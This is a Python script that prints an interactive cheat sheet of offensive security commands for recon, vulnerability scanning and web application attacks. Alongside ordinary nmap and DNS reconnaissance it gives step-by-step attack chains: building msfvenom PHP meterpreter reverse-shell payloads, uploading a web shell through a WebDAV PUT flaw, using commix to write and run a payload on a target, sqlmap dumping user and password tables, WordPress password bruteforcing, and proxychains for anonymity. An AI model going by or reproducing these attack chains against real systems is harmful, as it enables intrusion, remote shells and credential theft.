HackingComm.py

#!/usr/bin/python

from termcolor import colored

print(colored('____________________________________________________________________________________________________________________________________________________________', 'cyan'))
print('\n')
print('\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print(colored('..........................................................$$$$$$$$$$$$$$$$$$$$$????????????????????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('............................................................$$$$$$$$$$$$$$$???????????????????????????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('...........................................................___$$$$$$$$$$$????????????????????????????????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('..........................................................||_||$$$$$$$$????????????????????????????????????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('........................................................_.|   |_$$$$$???????\     /???????????\     / ???????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('....................................................../|_||   |_\$$????????? \   / ??????????? \   /  ???????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('......................................................|   |   |  \$?????????  \ /  ???????????  \ /   ?????????????????$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('......................................................|   |   |   |?????????   \   ???????????   \    ????????????????????$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('....................................................._|   |   |	 |_?????????  / \  ???????????  / \   ??????????????????????$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('..................................................../||   |   |   |_\??????? /   \ ??????????? /   \  ???????????????????????$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('....................................................| |   |   |   |  |??????/     \???????????/     \ ???????????????????????$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('....................................................| |       |   |  |???????????????????????????????????????????????????????$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('....................................................|             |  |??????????????????????????????????????????????????????$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('....................................................|                |????????????____________________?????????????????????$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('.....................................................\               |???????????/ __________________ \???????????????????$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('......................................................\      /\      |$?????????/ /??????????????????\ \????????????????$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('.......................................................\     \/     /$$$$??????/_/????????????????????\_\?????????????$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('........................................................\          /$$$$$$$$???????????????????????????????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('.........................................................\________/$$$$$$$$$$$$$????????????????????????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('..........................................................^^^^^^^^$$$$$$$$$$$$$$$$$???????????????????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('................__........................................========$$$$$$$$$$$$$$$$$$$$?????????????????????$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('...........____/By\____...................................~~~~~~~~$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('........../~hestihesti~\..................................|      |$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('..........| |       |  |..................................|      |$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))
print(colored('..........| |       |  |..................................|      |$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$', 'white'))

print(colored('___________________________________________________________________________________________________________________________________________________________', 'cyan'))
print('\n')



print('				WHAT KIND OF HACK DO YOU WANT TO DO?')

print(colored('1. Info Gather <4>', 'magenta'))
# line 76
print(colored('2. Vulnerability Analysis <2>', 'yellow'))
# line 189
print(colored('3. Web Application Analysis', 'magenta'))
# line 319
print(colored('4. Database Assessment', 'yellow'))
# line 
print(colored('5. Password Attacks', 'magenta'))
# line 441
print(colored('6. Wireless Attacks', 'yellow'))
# line 591
print(colored('7. Exploitation Tools', 'magenta'))
# line 712
print(colored('8. Sniffing & Spoofing', 'yellow'))
# line 813
print(colored('9. Post Exploitation', 'magenta'))
# line 875
print(colored('10. Forensics', 'yellow'))
# line 1101
print(colored('11. Social Engineering', 'magenta'))
# line 1204
print(colored('12. MISC', 'yellow'))
# line 1238

number = input('What Number Catagory Do You Want To Choose: ')
print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
print('\n')
def Catagory():

#///////////////////////////////DONE///////////////DONE/////////////////////////////////////////////////////////////
#############################3		SCANNING		####################################################
	if number == "1":
		print(colored("1. nmap: Discovers Hosts And Services On A Computer Network", 'blue'))
		print(colored("2. recon-ng: A Full-Featured Reconnaissance Framework", 'cyan'))
		print(colored("3. spiderfoot: Gathers Info On IP Addresses, Domain Names, Email Addresses, Names, And More", 'blue'))
		print(colored("4. dmitry: Can Be Used To Gather A Number Of Valuable Information", 'cyan'))
		print(colored("5. masscan: Fast Port Scanner", 'blue'))
		print(colored("6. photon: Gathers Info, Uses Spidering", 'cyan'))
		print(colored("7. fierce: A Simple Network Mapping And Port Scanning Tool", 'blue'))
		print(colored("8. dnsenum: A Tool To Find DNS Servers", 'cyan'))
		print(colored("9. dnsrecon: Does Reconnaissance On Domains", 'blue'))

		App1 = input("What Application Do You Want To Use: ")
		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')

		if App1 == "1":
			print(colored("ipcalc <IP Address>", 'green'))
			print('^  This Gets An IPs Network Range, Once Connected... ^ \n')
			print(colored("nmap <ipcalc 'Network' results> -p -oG filename.txt", 'green'))
			print('^  This Performs A Scan For Open Ports And Saves Result To A .txt file ^ \n')
			print(colored("cat filename.txt | awk '/Up$/{print $2}' | cat >> targetIP.txt", 'green'))
			print('^  This Puts The Nmap Results In A Readable Format And Saves It To A New .txt File (targetIP.txt  ^ \n')
			print(colored("ping <IP Address>", 'green'))
			print('^ Check if Network Is Active ^ \n')
			print(colored("nmap <IP Address>/24", 'green'))
			print('^ Check Network For Active Devices ^ \n')
			print(colored("nmap -sS <IP Address>", 'green'))
			print('^ Stealthy Scan ^ \n')
			print(colored("nmap -sT <IP Address>", 'green'))
			print('^ TCP Scan ^ \n')
			print(colored("nmap -sU <IP Address>", 'green'))
			print('^ UDP Scan ^ \n')

		elif App1 == "2":
			print(colored("recon-ng", 'green'))
			print('^  This Starts The Program ^ \n')
			print(colored("workspaces create <workspace name>", 'green'))
			print('^  First Thing To Do Is Create A Workspace  ^ \n')
			print(colored("marketplace search", 'green'))
			print('^  This lists all modules that can be installed  ^ \n')
			print(colored("marketplace install <name of module>", 'green'))
			print('^ Installs module you would like to implement ^ \n')
			print(colored("modules load <name of module>", 'green'))
			print('^  This Loads The Previously Installed Module To Program ^ \n')
			print(colored("options set SOURCE <domain name>", 'green'))
			print('^ This Sets Target You Wish To Perform Module On ^')
			print(colored("run", 'green'))
			print('^ This Runs The Program After Setting It Up ^ \n')

		elif App1 == "3":
			print(colored("spiderfoot -l 127.0.0.1:5001", 'green'))
			print('^  The result from this command will lead you to a link, go to it  ^ \n')

		elif  App1 == "4":
			print(colored("dmitry -o <url>", 'green'))
			print('^ Lists Some Information From A Website ^ \n')
			print(colored("dmitry -e <url>", 'green'))
			print('^ Searches For Potential E-mail Addresses From Site ^ \n')

		elif App1 == "5":
			print(colored("masscan -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print(colored("host <domain name>", 'green'))
			print('^ This Gives You The IP Address Of A Websites Server ^ \n')
			print(colored("masscan <domains IP address>/24 -p 80,443", 'green'))
			print('^ This Is A Basic Scanning Operation In Masscan ^ \n')
			print(colored("masscan <target IP Address> -p 80,443 --banners --source-ip <Your IP Address>", 'green'))
			print('^ This Will Attempt To Grab Banners From The IPs We Scan. (The OS May Reject The Packet) ^ \n')
			print(colored("masscan <target IP address> -p 80,443 --output-format=xml --output-filename=<File Name>.xml", 'green'))
			print(colored("masscan <target IP address>/24 -p80,443 -oX <Name Of File>.xml", 'green'))
			print('^ This Will Save The Results Into Files ^ \n')
			print(colored("masscan <target IP> --rate=1 -p80,443 --ping", 'green'))
			print('^ This Will Test If Devices Are Responsive Or Not ^ \n')
		elif App1 == "6":
			print(colored("photon", 'green'))
			print(colored("git clone https://github.com/s0md3v/Photon", 'green'))
			print('^ Either One Of These Will Download Photon To Your Computer ^ \n')
			print(colored("photon -u <website URL> -l 3 -t 200 --wayback", 'green'))
		elif App1 == "7":
			print(colored("fierce -h", 'green'))
			print('^ This Pulls Up The Help Menu ^ \n')
			print(colored("fierce -dns <website> -threads <Number Of Threads>", 'green'))
			print('^ This Will List The Servers Attached To The Website ^ ')
			print('^ If Their Is Info That Fierce Couldnt Collect, Use "nslookup" ^ \n')
			print(colored("nslookup", 'green'))
			print(colored("set d2", 'green'))
			print(colored("whatif.<website>", 'green'))
			print('^ Set D2 Is For Verbose Mode, Ad It Does A HArd Search ^ \n')
			print(colored("dig whatif.<website>", 'green'))
			print('^ Dig Is Also A Great Tool For Information Gathering ^ \n')
		elif App1 == "8":
			print(colored("dnsenum -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print(colored("dnsenum -enum <website URL>", 'green'))
			print('^ This Runs A Basic Dnsenum Command ^ \n')
			print(colored("dnsenum -f <file> -r <URL>", 'green'))
			print('^ Using Bruteforce And From File For Enumeration Of Subdomain ^ ')
			print('^ The file will have each Of The Following Contents On A New Line, And We Will Name The File "subdomain.txt" ^ ')
			print('^ mail, www, webmail, service, support, dev, clients ^ \n')
		elif App1 == "9":
			print(colored("dnsrecon -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print(colored("dnsrecon -d <Website URL>", 'green'))
			print('^ These Two Commands Will Help You Retrieve A Domains Records ^ \n')
			print(colored("dnsrecon -d <Website URL> -t zonewalk", 'green'))

		else:
			pass


#//////////////////////////////////////DONE/////////////////////////////DONE////////////////////////////////////////////////
#######################################  	VULNERABILITY ANALYSIS		############################################
	elif number == "2":
		print(colored("1. nikto: Examines Webservers For Infected Files", 'blue'))
		print(colored("2. nmap: Scans For Vulnerabilities", 'cyan'))
		print(colored("3. XSStrike: Specially Designed To Find Cross-Site Scripting", 'blue'))
		print(colored("4. wapiti: Web Based Vulnerability Scanner", 'cyan'))
		print(colored("5. watobo: Can Perform Crawling And Vulnerability Scans", 'blue'))
		print(colored("6. cadaver: ", 'cyan'))
#		print(colored("7. davtest: ", 'blue'))

		App2 = input("What Application Do You Want To Use: ")
		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')

		if App2 == "1":
			print(colored("nikto --help", 'green'))
			print('^ Provides A List Of Commands ^ \n')
			print(colored("nikto -h <IP Address or Hostname> -ssl", 'green'))
			print('^  If You Know  The Site Is A SSL Site, Running This Command Can Save You Time  ^ \n')
			print(colored("ipcalc <IP Address>", 'green'))
			print('^  This Gets An IPs Network Range, Once Connected... ^ \n')
			print(colored("nmap -p <ipcalc 'Network' results> -oG filename.txt", 'green'))
			print('^  This Performs A Scan For Open Ports And Saves Result To A .txt file ^ \n')
			print(colored("cat filename.txt | awk '/Up$/{print $2}' | cat >> targetIP.txt", 'green'))
			print('^  This Puts The Nmap Results In A Readable Format And Saves It To A New .txt File (targetIP.txt  ^ \n')
			print(colored("nikto -h targetIP.txt", 'green'))
			print('^  Scans For Vulnerabilities Of All IPs listed in .txt file ^ \n')
			print(colored("nikto -h www.anywebsite.com", 'green'))
			print('^  This Scans Any Website You Wish To Test  ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'magenta'))
			print('		v	STAY ANONYMOUS WITH PROXYCHAINS		v	')
			print(colored("proxychains nikto -h <IP Address or Host> ", 'green'))
			print('^ Run Command Above To Stay Anonymous, May Need To Configure Proxychains From Static To Dynamic In /etc/proxychains.conf ^ \n')
			print(colored('nikto -h <IP or hostname> -Format msf+', 'green'))
			print('^ This Searches For A Vulner And If Found, It Pairs It With A Weaponized Exploit ^\n')
			print('MUST DO THESE SCANS UNDER A VPN')
		elif App2 == "2":
			print(colored("nmap --script auth <IP Address> -sS", 'green'))
			print('^ Lists Open Ports As Well As Possible Vulnerabilities ^ \n')
			print(colored("nmap --script malware <IP Address> -sS", 'green'))
			print('^ Tests network to see if it contains malware ^ \n')
			print(colored("nmap --script banner <IP Address> -sS", 'green'))
			print('^ Gets Detailed Information ^ \n')
			print(colored("nmap --script exploit <IP Address> -sS", 'green'))
			print('^ To Attempt To Exploit Vulnerabilities ^ \n')
		elif App2 == "3":
			print(colored("git clone https://github.com/s0md3v/XSStrike.git", 'green'))
			print('^ This Will Download The Repo From Github ^ \n')
			print(colored("chmod +x xsstrike.py", 'green'))
			print('^ This Will Raise Permissions To Allow You To Use The Program ^ \n')
			print(colored("python3 xsstrike.py -u '<website URL>' --crawl", 'green'))
			print('^ This Will Test A Website To See If It Vulnerable ^ ')
			print('^ If You Want To Save The Resuts To A TXT File, Just Add... "> /home/<USERNAME>/Desktop/FILENAME.txt" ^ \n')
		elif App2 == "4":
			print(colored("wapiti -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print(colored("wapiti -u <url>", 'green'))
			print('^ This Performs A Basic Scan On A Website ^ \n')
			print(colored("wapiti-getcookie -h", 'green'))
			print('^ This Is How You Get Cookies From A Website And Save Them Under A JSON Format. ^ \n')
			print(colored("cd /root/.wapiti/generated_report", 'green'))
			print('^ This Is Where The Results Of The Scan Will Be Stored ^ \n')
			print(colored("firefox <name_of_report>.html", 'green'))
			print('^ This Will Allow You To View The Results Of The Scan ^ \n')
		elif App2 == "5":
			print(colored("proxychains watobo", 'green'))
			print('^ This Will Run The GUI Program ^ \n')
			print(colored("On The Top Left Corner, Click On The '+' sign", 'green'))
			print('^ Set A Project Name, We Will Call It "crawler" ^ ')
			print('^ Set The Session Name As "c1" ^ \n')
			print('NOW BACK TO TERMINAL')
			print(colored("proxychains firefox <website URL>", 'green'))
			print('^ Preferable Start Out On A Login Page ^ \n')
			print('Now Time To Start Our Crawler Plugin')
			print(colored("In The Menu With Icons, There Will Be A Circle Shaped Named 'Plugin-Board' Click On It", 'green'))
			print('^ Click On Crawler ^ \n')
			print(colored("Type In The Start URL, Go To Auth Tab And Choose 'Form', Paste The Login Page URL (This Can Be The Same As The Start URL", 'green'))
			print(colored("Once Entered, Click On 'Load', Than Some Info Should Pop Up In A Window, Click On '+' sign", 'green'))
			print(colored("Click On 'undefined' And Type Out Credentials", 'green'))
			print(colored("Go Back To The Tabs And Choose 'Hooks'", 'green'))
			print(colored("Under the 'lambda' Window, Type Out... ", 'green'))
			print(colored("agent.cookie_jar.each do |cookie|", 'green'))
			print(colored("<spacebar>cookie.value = 'low' if cookie.name =~/^security$/", 'green'))
			print(colored("end", 'green'))
			print(colored("Back To The Tab, We Will Select 'Scope'", 'green'))
			print(colored("Type In 'security' Under Excluded URLs, And Press 'Add'", 'green'))
			print('^ "logout" Should Also Be In This List ^ \n')
			print(colored("Now In The General Tab, Click On 'Start'", 'green'))
			print(colored("Look For 'vulnerabilities/xss_r/' And Click On It", 'yellow'))
			print(colored("Click On 'Manual Request' On The Top Right Corner Of Screen", 'green'))
			print(colored("When That Window Pops Up, Click On 'Quick Scan'", 'green'))
			print(colored("When That Window Pops Up, Click On 'Next'", 'green'))
			print(colored("Select XSS And Press Start", 'green'))
			print(colored("Now Back To The Main Menu, Under 'Findings' Youll See An IP Address, Click On It", 'green'))
			print(colored("Click On '+' Sign For Vulnerabilities, Click '+' Under 'Reflected XSS', Click On The Conttent That Comes Up", 'green'))

		elif App2 == "6":
			print(colored("cadaver -h", 'green'))
			print('^ This Prints Out The Help Menu  ... On A Side Note, Cadaver Checks For An Http Put  Vulnerability ^ \n')
			print(colored("nikto -h http://<IP Address>/dav", 'green'))
			print('^ Type This Out In Your Terminal To See If The Web App Is Vulnerable , You Are Looking For ^')
			print('^ A Response Back In Terminal Saying "HTTP Method PUT Allows Clients To Save Files On The Web Server ^\n')
			print(colored("msfvenom -p php/meterpreter/reverse_tcp lhost=172.17.0.1 lport=4444 -f raw", 'green'))
			print('^ If That Message Does Come Up, Type The Following, This Creates A Payload To Attack The Vulnerability  ^\n')
			print(colored("COPY THE CONTENTS AFTER   ' FORWARDSLASH STAR", 'green'))
			print('^ This Is How You Exploit The Vulnerability ^')
			print('^ Once Copied, Type Out.. nano "<file_name>.php" And Paste The Payload And Save ^ \n')
			print(colored("cadaver http://<IP Address>/dav", 'green'))
			print('^ This Specifies A Target For Cadaver ^\n')
			print(colored("put /home/<user>/<file_name>.php", 'green'))
			print('^ Wait For A Notification That You Successfully Uploaded Your Shell To The Web Server ^ \n')
			print(colored('msfconsole', 'green'))
			print('^ Start Up Metasploit ^ \n')
			print(colored("use exploit/multi/handler", 'green'))
			print(colored('set payload php/meterpreter/reverse_tcp', 'green'))
			print(colored('set lhost <IP ADDR>', 'green'))
			print(colored('lport 4444', 'green'))
			print(colored('exploit', 'green'))
			print('^ After Typing These Out And Handler Is Started, Just Click On Payload On The Website ^ \n')



#		elif App2 == "7":


		else:
			return

#///////////////////////////////////////DONE/////////////////////////////////DONE/////////////////////////////////////////////////////////////////////
######################################		WEB  APPLICATION  ANALYSIS		##############################################
	elif number == "3":
		print(colored("1. commix: Allows You To Find And Exploit A Command Injection Vulnerability", 'blue'))
		print(colored("2. sqlmap: Automates The Process Of Detecting And Exploiting SQL Injection Flaws And Taking Over Of Database Servers", 'cyan'))
		print(colored("3. skipfish: Used For Information Gathering And Testing The Security Of Websites", 'blue'))
		print(colored("4. wpscan: Scans Remote WordPress Installations To Find Security Issues", 'cyan'))
		print(colored("5. dirbuster: Uses Bruteforce To Recover Hidden Directories And Files", 'blue'))

		App3 = input("What Application Do You Want To Use: ")
		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')

		if App3 == "1":
			print(colored("Go To Any Website --> Use The 'Inspect' Tool In Settings For Site --> Choose Network --> Click On Raw Headers To View Information", 'green'))
			print('^ You Need The Cookie That Contains The Session ID And Security Level In Order For Commix To Work ^ \n')
			print(colored("commix -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print(colored("commix -u http://website.com/to/exploit/ --cookie=<'PHPSESSID=cookieString; security=low'> --data=<'ip=127.0.0.1&submit=submit'>", 'green'))
			print('^ This Will Search For A Parameter That Is Vulnerable To Command Inject, It Will Also Ask If We Want To Use A "Pseudo-Terminal Shell" ^')
			print('^ If "y", We Will Get A Command Shell Where We Can Run Commands Like "whoami" And "uname -a" To View Information About The Server ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n", 'magenta'))
			print('			Upload Reverse Shell			\n')
			print(colored("msfvenom -p php/meterpreter/reverse_tcp lhost=<Your IP Address> lport=<Enter Port You Wish To Use> -e php/base64 -f raw > payload.php", 'green'))
			print('^ This Creates A Payload To Place A Reverse Shell On The Target ^ \n')
			print(colored("nano payload.php --> add '<?php' to the beginning of file and add '?>' at the end of file", 'green'))
			print('^ Once payload.php Is Successfully Created, We Just Need To Add PHP Tags To The File As Explained Above. CTRL+o To Save, CTRL+x Exit ^ \n')
			print(colored("msfconsole", 'green'))
			print('^ This Opens Up Metasploit, We Will Need To Use This To Listen For Incoming Connections ^ \n')
			print(colored("use exploit/multi/handler", 'green'))
			print(colored("set payload php/meterpreter/reverse_tcp" ,'green'))
			print(colored("set lhost <Your IP Address>", 'green'))
			print(colored("set lport <Select Port You Chose From Before>", 'green'))
			print('^ Above Commands Set The Payload, Listening Address, And Port ^ \n')
			print(colored("run", 'green'))
			print('^ This Starts The Listener ^ Now Dont Exit This Window And Create A New Window \n')
			print(colored("commix -h http://website.com/to/exploit/ --cookie=<'PHPSESSID=cookieString; security=low'> --data=<'ip=127.0.0.1&submit=submit'> --file-write='/path/to/payload.php' --file-dest='/var/www/payload.php' --os-cmd='php -f /var/www/payload.php'", 'green'))
			print('^ If This Works Right This Will Allow Our Payload To Be Executed And A Session To Be Caught By Handler. Commix Will Run For A Minute, But Eventually We Will See Our File Was Created On Target ^ ')
			print('^ In Order To See If File Was Created On Target Machine, Go To The Msfconsole Window (That Window I Said Not To Close), And Now You Can Run Commands Like "getuid" And "sysinfo" To View Info On Target ^ \n')
			print('All Finished!')
		elif App3 == "2":
			print(colored("sqlmap -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print(colored("EXAMPLE: http://www.site.com/section.php?id=51", 'green'))
			print('^ This Is Prone To SQL Injection Because The Developer Did Not Properly Escape The Parameter ID. It Can Be Tested With.... ^ \n')
			print(colored("EXAMPLE: http://www.site.com/section.php?id=51'", 'green'))
			print('^ Notice The Symbol Put In After 51 Ib Link.         -^-   \n')
			print(colored("sqlmap -u 'http://www.site.com/section.php?id=51'", 'green'))
			print('^ This Checks The Input Parameters To See If They Are Vulnerable To SQL Injection Or Not. ^ \n')
			print(colored("sqlmap -u 'http://www.site.com/section.php?id=51' --dbs", 'green'))
			print('^ Once Sqlmap Confirms A URL Is Vulnerable To SQL Injection As Well As Exploitable. ^')
			print('^ Next Is To  Find Out The Names On The Databases That Exist On The Remote System. "--dbs" is used to get the database list ^ \n')
			print(colored("sqlmap -u 'http://www.site.com/section.php?id=51' --tables -D <Database Of Interest>", 'green'))
			print('^  This Will Find Out What Tables Exist In A Particular Database ^ \n')
			print(colored("sqlmap -u 'http://www.site.com/section.php?id=51' --columns -D <Database Of Interest> -T <Important Table(users)>", 'green'))
			print('^ Now That We Have A List Of Tables, Its Wise To Get Columns Of Important Tables. ^')
			print('^ In Example Above We Use The Table "users" And It Contains Usernames And Passwords. ^ \n')
			print(colored("sqlmap -u 'https://www.site.com/section.php?id=51' --dump -D <DataBase Of Interest> -T <Important Table>", 'green'))
			print('^ Now This Is The Fun Part! This Will Extract The Data From The Table! ^ \n')
			print('\n')
			print('		Sometimes sqlmap is unable to connect to the url, if that is the case use the "--random-agent" option     *')
			print('^ 	For URLs That Are Not In The param=value form, Cannot Automatically Know Where To Inject. Use * As A Mark To Inject  ^')
			print('^ EXAMPLE:	>>>	http://www.site.com/business_name/method/43*/80		<<<  ^')

		elif App3 == "3":
			print(colored("skipfish -h", 'green'))
			print('^ Displays A List Of Options Available For This Program ^ \n')
			print(colored("skipfish -o 202 http://192.168.1.202/wordpress", 'green'))
			print('^ Scans A WordPress Website Using Its IP Address ^ \n')
			print(colored("skipfish -o SkipfishTEST http://192.168.225.37/bodgeit", 'green'))
			print('^ Use This Tool To Scan bodegeit ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'magenta'))
			print('\n')
			print('BruteForcing \n')
			print('\n')
			print(colored("skipfish [...other options..] -S dictionaries/complete.wl http://example.com", 'green'))
			print('^ This Is An Extensive Bruteforcer ^ \n')
		elif App3 == "4":
			print(colored("wpscan --url <wordpress url>", 'green'))
			print('^ Scans WordPress Site For Most Popular And Recent VulnerABilities ^ ')
			print(' Keep An Eye Out For Wordpress Version As Well As The Theme Thats Used')
			print(' If WPScan Did In Fact Discover A Vulnerability, It Will Be Listed Starting With A Red "[!]" Followed By The Vulnerability \n')
			print(colored("wpscan --url <wordpress url> --enumerate u", 'green'))
			print('^ This Retrieves A List Of WordPress Users(authors/usernames) For The Target Host ^ \n')
			print(colored("wpscan --url <wordpress url> --wordlist <path/to/wordlist.txt> --username <username to bruteforce> --threads <number of threads to use>", 'green'))
			print('^ This Will Bruteforce The Password For Provided Username ^ \n')
		elif App3 == "5":
			print('EXAMPLE 1: Default Scan \n')
			print('\n')
			print(colored("Select The Application In Your Application Folder", 'green'))
			print('^ This Will Open Up A GUI Window Of The Program ^ \n')
			print(colored("Type In The URL Of The Website You Want To Test (Target URL), 'http://target.com:8080'", 'green'))
			print(colored("Set The Scan Time.. (Its The Number Of Threads)", 'green'))
			print(colored("Select 'List Based Bruteforce'", 'green'))
			print(colored("/usr/share/wordlists/dirbuster/directory-list-1.0.txt", 'green'))
			print('^ This Line Goes Into "File With List Of Dirs/Files" ^ \n')
			print(colored("Click On Start To Perform The Scan", 'green'))
			print('------------------------------------------------------------------------------------------------ \n')
			print('EXAMPLE 2: Get Requests Only \n')
			print('\n')
			print(colored("The Only Thing You Need To Change In Order To Do This Is Change The 'Work Method' To 'Use Get Requests Only'", 'green'))
			print('------------------------------------------------------------------------------------------------ \n')
			print('EXAMPLE 3: Pure Bruteforcing \n')
			print('\n')
			print(colored("Have Work Method On 'Use Get Requests Only'", 'green'))
			print(colored("Change The Select Scanning Type To 'Pure Brute Force'", 'green'))
			print(colored("In 'Char set' Click On Drop Down Menu And Choose 'a-zA-Z0-9%20-_'", 'green'))
			print(colored("Click On Start", 'green'))
			print('------------------------------------------------------------------------------------------------ \n')
			print('EXAMPLE4: URL Fuzz \n')
			print('\n')
			print(colored("In Target URL Type Out The Website, 'http://target.com'", 'green'))
			print(colored("Change The Work To 'Auto Switch'", 'green'))
			print(colored("Have The Scanning Type Set To 'List Based  Brute Force With The Same File Listed In Example 1", 'green'))
			print(colored("Under 'Select Starting Options', Choose 'URL Fuzz'", 'green'))
			print(colored("Type Out The URL Of The Site You Want To Fuzz 'http://target.com/admin=php?'", 'green'))
			print(colored("Click On Start", 'green'))

		else:
			return

#/////////////////////////////////////DONE///////////////////////////DONE/////////////////////////////////////////////////////////////////////
#################################		PASSWORD  CRACKING		##########################################
	elif number == "5":
		print(colored("1. cewl: Custom Wordlist Generator", 'blue'))
		print(colored("2. crunch: Wordlist Generator", 'cyan'))
		print(colored("3. hashcat: Advanced Password Recovery Utility Supporting 7 Different Modes", 'blue'))
		print(colored("4. john: Helps Admins Find Weak Passwords", 'cyan'))
		print(colored("5. medusa: Speedy, Parallel, And Modular, Login Bruteforcer", 'blue'))
		print(colored("6. ncrack: High Speed Network Authen Cracking Tool That Gives A User Full Access Over The Network Operations That Allows Complicated Bruteforcing Attaacks", 'cyan'))
		print(colored("7. ophcrack: Cracks Windows Login Passwords", 'blue'))

		App4 = input("What Application Do You Want To Use: ")
